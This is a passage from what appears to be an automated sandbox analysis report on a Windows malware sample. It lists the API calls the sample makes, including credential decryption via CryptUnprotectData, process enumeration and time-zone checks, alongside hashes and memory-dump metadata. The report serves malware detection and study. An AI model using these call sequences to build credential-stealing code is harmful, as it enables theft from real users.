                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 2512108ae4714a513e0a55451fe93ced0198b8d54e900f3d5005c04cd47924f7
                            • Instruction ID: 34ac8b09885ed26f2be89393a4bf5c03e7599cc57ef9aec0d7eb660505855c3b
                            • Opcode Fuzzy Hash: 2512108ae4714a513e0a55451fe93ced0198b8d54e900f3d5005c04cd47924f7
                            • Instruction Fuzzy Hash: C6414C7990421E9BDB24CFA0ED89BEEF7B8AB48304F1051A8E509A7284D7705A84DF91
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00E56C0C
                            • sscanf.NTDLL ref: 00E56C39
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E56C52
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E56C60
                            • ExitProcess.KERNEL32 ref: 00E56C7A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: 3485ff77a2bacafa23f9e3b62707f024b0b4590398a606669695939c45a743ca
                            • Instruction ID: 1642074409847153dd927334afb488c940189d51803b1d79344f7a6d8896fd46
                            • Opcode Fuzzy Hash: 3485ff77a2bacafa23f9e3b62707f024b0b4590398a606669695939c45a743ca
                            • Instruction Fuzzy Hash: C421EA75D00208ABCB18EFE4E9459EEB7B9BF48301F04852AF516B3254EB349648CB65
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E472AD
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E472B4
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E472E1
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E47304
                            • LocalFree.KERNEL32(?), ref: 00E4730E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 7507a311a301270830b95125e11c73955862e7048a59587c718313c50b6f9c3e
                            • Instruction ID: 5c45a492070a016ac0c5f34a13bd71bc71306c51b874ba8ef41e9a4b872af574
                            • Opcode Fuzzy Hash: 7507a311a301270830b95125e11c73955862e7048a59587c718313c50b6f9c3e
                            • Instruction Fuzzy Hash: 13014C75A84308BBDB24DFE4DD46F9EB778AB44B00F104554FB15BB2C4D6B0AA408BA4
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E597AE
                            • Process32First.KERNEL32(00E60ACE,00000128), ref: 00E597C2
                            • Process32Next.KERNEL32(00E60ACE,00000128), ref: 00E597D7
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 00E597EC
                            • CloseHandle.KERNEL32(00E60ACE), ref: 00E5980A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: ebd0acf7488b9f1690397e29e5ea3da3d560268894b3bd61e356b21d221afac0
                            • Instruction ID: d11633798be88f979b8ceb0649a898a04a75c972f18b2b9ecc71f2fe1a72c71b
                            • Opcode Fuzzy Hash: ebd0acf7488b9f1690397e29e5ea3da3d560268894b3bd61e356b21d221afac0
                            • Instruction Fuzzy Hash: 85011E75A10208EBDB28DFA5D944BEDB7B9BB08701F104599E909A7280D7349B84CF50
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: <7\h$huzx
                            • API String ID: 0-2989614873
                            • Opcode ID: 5c2839adda6ad438ff7af8ccf9cb0a73c14e7c8ab41628e375a2ff1f40376d2a
                            • Instruction ID: b94e17f31198a08b4271b9a58e73e7717716003c8dfa735a6eb3b37cdfa3da3b
                            • Opcode Fuzzy Hash: 5c2839adda6ad438ff7af8ccf9cb0a73c14e7c8ab41628e375a2ff1f40376d2a
                            • Instruction Fuzzy Hash: 9D63837369EBD41ECB27CB30A7B61517F26FA1335071869CEC4C1AB4B3C6809A16E356
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: [JM7$[JM7$l$]$p$]$*?{
                            • API String ID: 0-2911320789
                            • Opcode ID: 0f9710b23c7984020d89ad6c53319d9de3603299a62b87d317d798ec0333cc9d
                            • Instruction ID: b0464103a2aa44807ee229185b0ccbc3cb9440b6f3f6dacf1da123885a27cb50
                            • Opcode Fuzzy Hash: 0f9710b23c7984020d89ad6c53319d9de3603299a62b87d317d798ec0333cc9d
                            • Instruction Fuzzy Hash: 7262F6F360C2009FE3086E29EC8567AFBE5EF94720F16893DE6C5C3744EA3598418697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: oU/$l^g$nr$@c
                            • API String ID: 0-471548969
                            • Opcode ID: 0283c41b788418f027c2907b1bfdf4367f655d4ce23bf743530d3c4df9240dc7
                            • Instruction ID: 0af42080f21a7f9756e479a9355271fcb79c7f7ac477b87d9706e56c2ef48ac7
                            • Opcode Fuzzy Hash: 0283c41b788418f027c2907b1bfdf4367f655d4ce23bf743530d3c4df9240dc7
                            • Instruction Fuzzy Hash: A3B2E7F3A0C6109FE304AE2DEC8567AFBE5EF94760F16892DE6C4C3744E63598018796
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: :Gn$A+;w$rOm$\{
                            • API String ID: 0-4170739284
                            • Opcode ID: 41e5e554d62900cf9c47315056d9a0f8b64a6d6f4d98e6dd33ac4a8a344b4f8c
                            • Instruction ID: a0ae427dab0e573e653108de8ccea8d29b5496ac68ac6dacdac872eacb11e56b
                            • Opcode Fuzzy Hash: 41e5e554d62900cf9c47315056d9a0f8b64a6d6f4d98e6dd33ac4a8a344b4f8c
                            • Instruction Fuzzy Hash: BEA215F360C2049FE704AE2DEC8567ABBE5EFD4720F16893DEAC483744EA3558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: - $XtI$ZtL$+6k
                            • API String ID: 0-2321713521
                            • Opcode ID: 1f0f4215a9a07b779312d6c29b097221df78df397bf33dab0178f16bdeaa855c
                            • Instruction ID: 020e9969976f5e47865006d03ddb4852351fcc714e4eaf872a9e1883428e4277
                            • Opcode Fuzzy Hash: 1f0f4215a9a07b779312d6c29b097221df78df397bf33dab0178f16bdeaa855c
                            • Instruction Fuzzy Hash: 9FB2F7F3A0C2009FE704AE29DC8566AFBE9EFD4720F1A893DE6C4C7744E67558058693
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: MQ>$>w$U}_$:}
                            • API String ID: 0-2290953874
                            • Opcode ID: 4b6f930aab4e35715cbdbe4e740b21bc762582ab594fb648458d830239babd2a
                            • Instruction ID: 472c6b49a421ab86d7bf869fde51d5c08bc60c32026af154c44cc4d9369387a1
                            • Opcode Fuzzy Hash: 4b6f930aab4e35715cbdbe4e740b21bc762582ab594fb648458d830239babd2a
                            • Instruction Fuzzy Hash: 0CB2A6F260C200AFE304AF29DC85A7AF7E9EF98720F16893DE6C583744E63558458797
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: J[o$qZo}$"|>$2j5
                            • API String ID: 0-1495194624
                            • Opcode ID: d60c0bc2666fed20d8be952c8f56a3a2e3de4e84bda156318db8c994ceeb655a
                            • Instruction ID: fdfa694f3b2355f01ce88b909f02a7bd96e65028f0fc1792926e322f6d80b79f
                            • Opcode Fuzzy Hash: d60c0bc2666fed20d8be952c8f56a3a2e3de4e84bda156318db8c994ceeb655a
                            • Instruction Fuzzy Hash: A6823AF3A0C2049FE3046E2DEC8567AB7E5EF94720F1A453DEAC5C7740E93598058697
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00E451D4,40000001,00000000,00000000,?,00E451D4), ref: 00E59050
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 27d70ddd265a611d2dc4ae3312c39740b9c8ce69f768c0f2a2387eb9f31c6c5f
                            • Instruction ID: 671bdc2347fd4aafb8c8f5670ea405b65edb5795e4fad2e30432ba3da4ef0c52
                            • Opcode Fuzzy Hash: 27d70ddd265a611d2dc4ae3312c39740b9c8ce69f768c0f2a2387eb9f31c6c5f
                            • Instruction Fuzzy Hash: 3C110A74200204FFDF14CF54D894FEA73A9AF89315F109858FD199B381D775E9458B60
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,009CEAE8,00000000,?,00E60DF8,00000000,?,00000000,00000000), ref: 00E57BF3
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E57BFA
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,009CEAE8,00000000,?,00E60DF8,00000000,?,00000000,00000000,?), ref: 00E57C0D
                            • wsprintfA.USER32 ref: 00E57C47
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 155199656ae90616f1b4dc389bc0da2340e65d0b137892977f7dffee1842fa35
                            • Instruction ID: 0fb519bfe38a375b4cf8d0a212baa4304b8bf0081436267e501d612b32535fa6
                            • Opcode Fuzzy Hash: 155199656ae90616f1b4dc389bc0da2340e65d0b137892977f7dffee1842fa35
                            • Instruction Fuzzy Hash: 7F11A1B1945218EBEB248B54DD45FA9F778FB44711F1007E9FA1AA33C0DB741A848B51
                            APIs
                            • CoCreateInstance.COMBASE(00E5E120,00000000,00000001,00E5E110,00000000), ref: 00E539A8
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E53A00
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 1a5e43c5190f0d24457a5bb972114ef8ff56317c66cbd9738a1461c9ea48d51d
                            • Instruction ID: 495df29584087b9ad2e8ac784b98ff37a6bce89c765d6a8e048ac2d4ccb198cb
                            • Opcode Fuzzy Hash: 1a5e43c5190f0d24457a5bb972114ef8ff56317c66cbd9738a1461c9ea48d51d
                            • Instruction Fuzzy Hash: F9411670A00A289FDB24DB58CC95B9BB7B5AB48302F4055D8E608E72D0D7B16EC5CF50
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E4A2D4
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E4A2F3
                            • LocalFree.KERNEL32(?), ref: 00E4A323
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 40716fce252eebe0c7c34870a54e57f1e44be2f513cb70ff361c3b72c9fcb296
                            • Instruction ID: ecbc7da3cca4c160c4d9b0f1cd533e24640441ddd3ad938d150d3428199c5974
                            • Opcode Fuzzy Hash: 40716fce252eebe0c7c34870a54e57f1e44be2f513cb70ff361c3b72c9fcb296
                            • Instruction Fuzzy Hash: 2711A8B4A00209DFCB04DFA4D985AAEB7B5FB89300F108569FD15A7394D730AE51CB61
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: GV[u$Q*"R
                            • API String ID: 0-3849582035
                            • Opcode ID: 706ed096687bf7e2cfa5ec27a085fe6fcb5677c4e0686ea99469246331128142
                            • Instruction ID: bca69a47f6fb1d0c293d06da0c40cb7b89c48b0baf4c7112f6caa97944a71dc4
                            • Opcode Fuzzy Hash: 706ed096687bf7e2cfa5ec27a085fe6fcb5677c4e0686ea99469246331128142
                            • Instruction Fuzzy Hash: E7B22BF360C2009FE704AE2DEC45A7BBBE9EBD4720F1A493DEAC4C7744E53598058696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $Og$Z>o
                            • API String ID: 0-1849843782
                            • Opcode ID: 0a65f22faa610aa43d7900a16a299a114ee3f362a6d74f82d07f7d6d5b1142f6
                            • Instruction ID: 9517e0443fdd6947aa4538944cc2e53b77e4a741b0664858903d258ec43ae206
                            • Opcode Fuzzy Hash: 0a65f22faa610aa43d7900a16a299a114ee3f362a6d74f82d07f7d6d5b1142f6
                            • Instruction Fuzzy Hash: 88B2D3F39082149FE314AE2DEC856AAFBE9EF94720F16492DEAC4D7340E67558008797
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: LzHv$p/9>
                            • API String ID: 0-3928622259
                            • Opcode ID: 27f5f87b23bff674de013250584e78819e14c5e0a63607ac521c6bf37ce2682f
                            • Instruction ID: 1726d0aac02ed51922a3aab5042e20a233f8b0f5a50c6db503cce211b823b4b3
                            • Opcode Fuzzy Hash: 27f5f87b23bff674de013250584e78819e14c5e0a63607ac521c6bf37ce2682f
                            • Instruction Fuzzy Hash: 28A2D6F350C204AFE704AE29EC8567AFBE5EF94720F1A492DE6C4C7744E63598408B97
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
